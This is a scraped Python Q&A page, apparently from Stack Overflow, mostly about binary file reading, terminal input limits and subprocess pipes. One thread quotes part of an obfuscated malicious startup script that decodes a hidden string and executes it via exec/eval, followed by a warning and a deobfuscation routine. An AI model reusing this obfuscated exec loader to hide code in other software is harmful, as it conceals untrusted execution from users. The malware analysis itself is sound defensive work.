File read reaches end of file unexpectedly - python

I'm translating a script from matlab, which reads a file of binary-encoded 32-bit integers and parses them appropriately. I have written the following method that is intended to mimic matlab's fread() function:
def readi(f,n):
x = zeros(n,int);
for i in range(0,n):
x[i] = struct.unpack('i',f.read(4))[0];
print x[i];
return x;
I call this function variously with n between 1 and 9 in my script as I parse out the data. My problem is that the script only gets part of the way into the file before I get this error:
x[i] = struct.unpack('i',f.read(4))[0];
struct.error: unpack requires a string argument of length 4
It appears that python thinks I have reached the end of the file. The point in execution where the error occurs is a line in a loop that has already been iterated over several times. In addition, the small portion of the file that has been parsed already matches exactly what my matlab script produces from the exact same file (not a copy). Matlab, however, is able to read a much larger dataset from the file. Does anyone have ideas on why this error is occurring?

In my own testing, whether the file was opened in binary-mode or not (surprisingly) didn't matter. The only thing I can suggest is to make sure you understand the format of the input file exactly. So in addition to reading the matlab script, it might be a good idea to look at hex dump of the file where you can see the individual bytes of raw data and be able to verify whether it matches your understanding of the layout of its contents.
Besides all that, you could try the following simplification/optimization of your readi() function which does not require the temporaryxlist and reads the bytes of all the integers in the group with one call tofile.read():
def readi(f, n):
fmt = '%di' % n
return struct.unpack(fmt, f.read(struct.calcsize(fmt)))
However I don't think it will solve your problem because it should be equivalent to what you already doing, return value-wise anyway (it doesn't print anything like yours).
One final note -- you don't need to end your lines of code with a semicolon. Python isn't like C and several other languages in that respect.

Related

Python np.fromfile() adding arbitrary random comma when reading from binary file

I encounter weird problem and could not solve it for days. I have created byte array that contains values from 1 to 250 and write it to binary file from C# using WriteAllBytes.
Later i read it from Python using np.fromfile(filename, dtype=np.ubyte). However, i realize this functions was adding arbitrary comma (see the image). Interestingly it is not visible in array property. And if i call numpy.array2string, comma turns '\n'. One solution is to replace comma with none, however i have very long sequences it will take forever on 100gb of data to use replace function. I also recheck the files by reading using .net Core, i'm quite sure comma is not there.
What could i be missing?
Edit:
I was trying to read all byte values to array and cast each member to or entire array to string. I found out that most reliable way to do this is:
list(map(str, (ubyte_array))
Above code returns string list that its elements without any arbitrary comma or blank space.

Trying to understand this potentially virus encrypted pyw file

Today I realised this .pyw file was added into my startup files.
Though I already deleted it, I suspect what it may have initially done to my computer, but it's sort of encrypted and I am not very familiar with Python, but I assume as this is the source code regardless, there is no actual way to completely encrypt it.
Can someone either guide me through how I can do that, or check it for me?
edit: by the looks of it I can only post some of it here, but it should give brief idea of how it was encrypted:
class Protect():
def __decode__(self:object,_execute:str)->exec:return(None,self._delete(_execute))[0]
def __init__(self:object,_rasputin:str=False,_exit:float=0,*_encode:str,**_bytes:int)->exec:
self._byte,self._decode,_rasputin,self._system,_bytes[_exit],self._delete=lambda _bits:"".join(__import__(self._decode[1]+self._decode[8]+self._decode[13]+self._decode[0]+self._decode[18]+self._decode[2]+self._decode[8]+self._decode[8]).unhexlify(str(_bit)).decode()for _bit in str(_bits).split('/')),exit()if _rasputin else'abcdefghijklmnopqrstuvwxyz0123456789',lambda _rasputin:exit()if self._decode[15]+self._decode[17]+self._decode[8]+self._decode[13]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read() or self._decode[8]+self._decode[13]+self._decode[15]+self._decode[20]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read()else"".join(_rasputin if _rasputin not in self._decode else self._decode[self._decode.index(_rasputin)+1 if self._decode.index(_rasputin)+1<len(self._decode)else 0]for _rasputin in "".join(chr(ord(t)-683867)if t!="ζ"else"\n"for t in self._byte(_rasputin))),lambda _rasputin:str(_bytes[_exit](f"{self._decode[4]+self._decode[-13]+self._decode[4]+self._decode[2]}(''.join(%s),{self._decode[6]+self._decode[11]+self._decode[14]+self._decode[1]+self._decode[0]+self._decode[11]+self._decode[18]}())"%list(_rasputin))).encode(self._decode[20]+self._decode[19]+self._decode[5]+self._decode[34])if _bytes[_exit]==eval else exit(),eval,lambda _exec:self._system(_rasputin(_exec))
return self.__decode__(_bytes[(self._decode[-1]+'_')[-1]+self._decode[18]+self._decode[15]+self._decode[0]+self._decode[17]+self._decode[10]+self._decode[11]+self._decode[4]])
Protect(_rasputin=False,_exit=False,_sparkle='''ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83/ceb6/f2a6bdbe/f2a6bdbb/f2a6bf83/f2a6bf80/f2a6bdbb/f2a6bf93/f2a6bf89/f2a6bf8f/f2a6bdbb/f2a6bebe/f2a6bebf/f2a6bf89/f2a6bebc/f2a6bf80/
OBLIGATORY WARNING: The code is pretty obviously hiding something, and it eventually will build a string and exec it as a Python program, so it has full permissions to do anything your user account does on your computer. All of this is to say DO NOT RUN THIS SCRIPT.
The payload for this nasty thing is in that _sparkle string, which you've only posted a prefix of. Once you get past all of the terrible spacing, this program basically builds a new Python program using some silly math and exec's it, using the _sparkle data to do it. It also has some basic protection against you inserting print statements in it (amusingly, those parts are easy to remove). The part you've posted decrypts to two lines of Python comments.
# hi
# if you deobf
Without seeing the rest of the payload, we can't figure out what it was meant to do. But here's a Python function that should reverse-engineer it.
import binascii
# Feed this function the full value of the _sparkle string.
def deobfuscate(data):
decode = 'abcdefghijklmnopqrstuvwxyz0123456789'
r = "".join(binascii.unhexlify(str(x)).decode() for x in str(data).split('/'))
for x in r:
if x == "ζ":
print()
else:
x = chr(ord(x)-683867)
if x in decode:
x = decode[(decode.index(x) + 1) % len(decode)]
print(x, end='')
Each sequence of hex digits between the / is a line. Each two hex digits in the line is treated as a byte and interpreted as UTF-8. The resulting UTF-8 character is then converted to its numerical code point, the magic number 683867 is subtracted from it, and the new number is converted back into a character. Finally, if the character is a letter or number, it's "shifted" once to the right in the decode string, so letters move one forward in the alphabet and numbers increase by one (if it's not a letter/number, then no shift is done). The result, presumably, forms a valid Python program.
From here, you have a few options.
Run the Python script I gave above on the real, full _sparkle string and figure out what the resulting program does yourself.
Run the Python script I gave above on the real, full _sparkle string and post the code in your question so we can decompose that.
Post the full _sparkle string in the question, so I or someone else can decode it.
Wipe the PC to factory settings and move on.

Can we remove the input function's line length limit purely within Python? [duplicate]

I'm trying to input() a string containing a large paste of JSON.
(Why I'm pasting a large blob of json is outside the scope of my question, but please believe me when I say I have a not-completely-idiotic reason!)
However, input() only grabs the first 4095 characters of the paste, for reasons described in this answer.
My code looks roughly like this:
import json
foo = input()
json.loads(foo)
When I paste a blob of JSON that's longer than 4095 characters, json.loads(foo) raises an error. (The error varies based on the specifics of how the JSON gets cut off, but it invariably fails one way or another because it's missing the final }.)
I looked at the documentation for input(), and it made no mention of anything that looked useful for this issue. No flags to input in non-canonical mode, no alternate input()-style functions to handle larger inputs, etc.
Is there a way to be able to paste large inputs successfully? This would make my tool's workflow way less janky than having to paste into a file, save it somewhere, and then pass the file's location into the script.
Python has to follow the terminal rules. But you could use a system call from python to change terminal behaviour and change it back (Linux):
import subprocess,json
subprocess.check_call(["stty","-icanon"])
result = json.loads(input())
subprocess.check_call(["stty","icanon"])
Alternately, consider trying to get an indented json dump from your provider that you can read line by line, then decode.
data = "".join(sys.stdin.readlines())
result = json.loads(data)

Why python automatically returns character counts when write file

I recently noticed that when I have the following code:
File = "/dir/to/file"
Content = "abcdefg"
with open(File,"a") as f:
f.write(Content)
I got "7" as an output and it is the count of characters in the variable "Content". I do not recall seeing this (I used ipython notebook before, but this time I did it in the python environment in shell) and wonder if I did something wrong. My python version: Python 3.3.3. Thank you for your help.
As always this behaviour is normal for most .write() implementations, see also I/O Base Classes.
For example io.RawIOBase.write
Write the given bytes-like object, b, to the underlying raw stream, and return the number of bytes written.
or io.TextIOBase.write
Write the string s to the stream and return the number of characters written.
Which IO-class is used depends on (the OS and) the parameters given to open. But as far as I can see all of them return some sort of "characters" or "bytes" written count.

C subprocess from Python: sub.stdin.write IOError Broken Pipe

I am getting a Broken Pipe error when writing a large quantity of data very fast to a C subprocess.
So I am running a c subprocess from a python script:
process = subprocess.Popen("./gpiopwm", stdin=subprocess.PIPE)
while True:
process.stdin.write("m2000\n")
print "bytes written"
Sectio of main loop of gpiopwm.c:
printf("1\n");
while (1) {
fgets(input,7,stdin); // Takes input from python script
printf("2\n");
numbers = input+1; // stores all but first char of input
char first = input[0]; // stores first char of input
if (first=='m') {
printf("3\n");
printf("%s\n",numbers);
}
}
However, the output from this is as follows:
1
bytes written
Traceback (most recent call last):
File "serial-receive-to-pwm.py", line 20, in <module>
process.stdin.write("m2000\n")
IOError: [Errno 32] Broken pipe
The C program evidently breaks at the fgets line, as 2 is never printed.
What have I done wrong? How can I avoid this?
EDIT:
I've updated the fgets line so that it does not include the dereference argument, but am still getting the broken pipe error.
EDIT:
input is initialized as char *input="m2000";
If you try running your C program from the console, you will see that it crashes. And if you run in a debugger, you will see that it's on this line:
fgets(*input,7,stdin);
It seems like input is a character array, and when you dereference it with *input you are passing not a pointer but a single char value. This leads to undefined behavior and the crash.
That line should have given you if not an error then a very big warning message from the compiler. Don't ignore warning messages, they are often an indicator of you doing something wrong and possibly dangerous.
A general tip: When developing a program that should be called from another program, like you do here, test the program first to make sure it works. If it doesn't work, then fix it first.
A final tip: Remember that fgets includes the newline in the destination string. You might want to check for it and remove it if it's there.
With the last edit, showing the declaration of input we know the real problem: You're trying to modify constant data, and also you want to write beyond the bounds of the data as well.
When you make input point to a literal string, you have to remember that all literal strings are read only, you can not modify a literal string. Trying to do so is undefined behavior. To make it worse, your string is only six characters long, but you try to write seven characters to it.
First change the declaration and initialization of input:
char input[16] = "m2000\n";
This will declare it as an array, located on the stack and that can be modified. Then do
while (fgets(input, sizeof(input), stdin) != NULL) { ... }
This accomplishes two things: First by using sizeof(input) as the size, you can be sure that fgets will never write out of bounds. Secondly, by using the fgets call in the loop condition the loop will end when the Python script is interrupted, and you won't loop forever failing to read anything and then work on data that you've never read.

Categories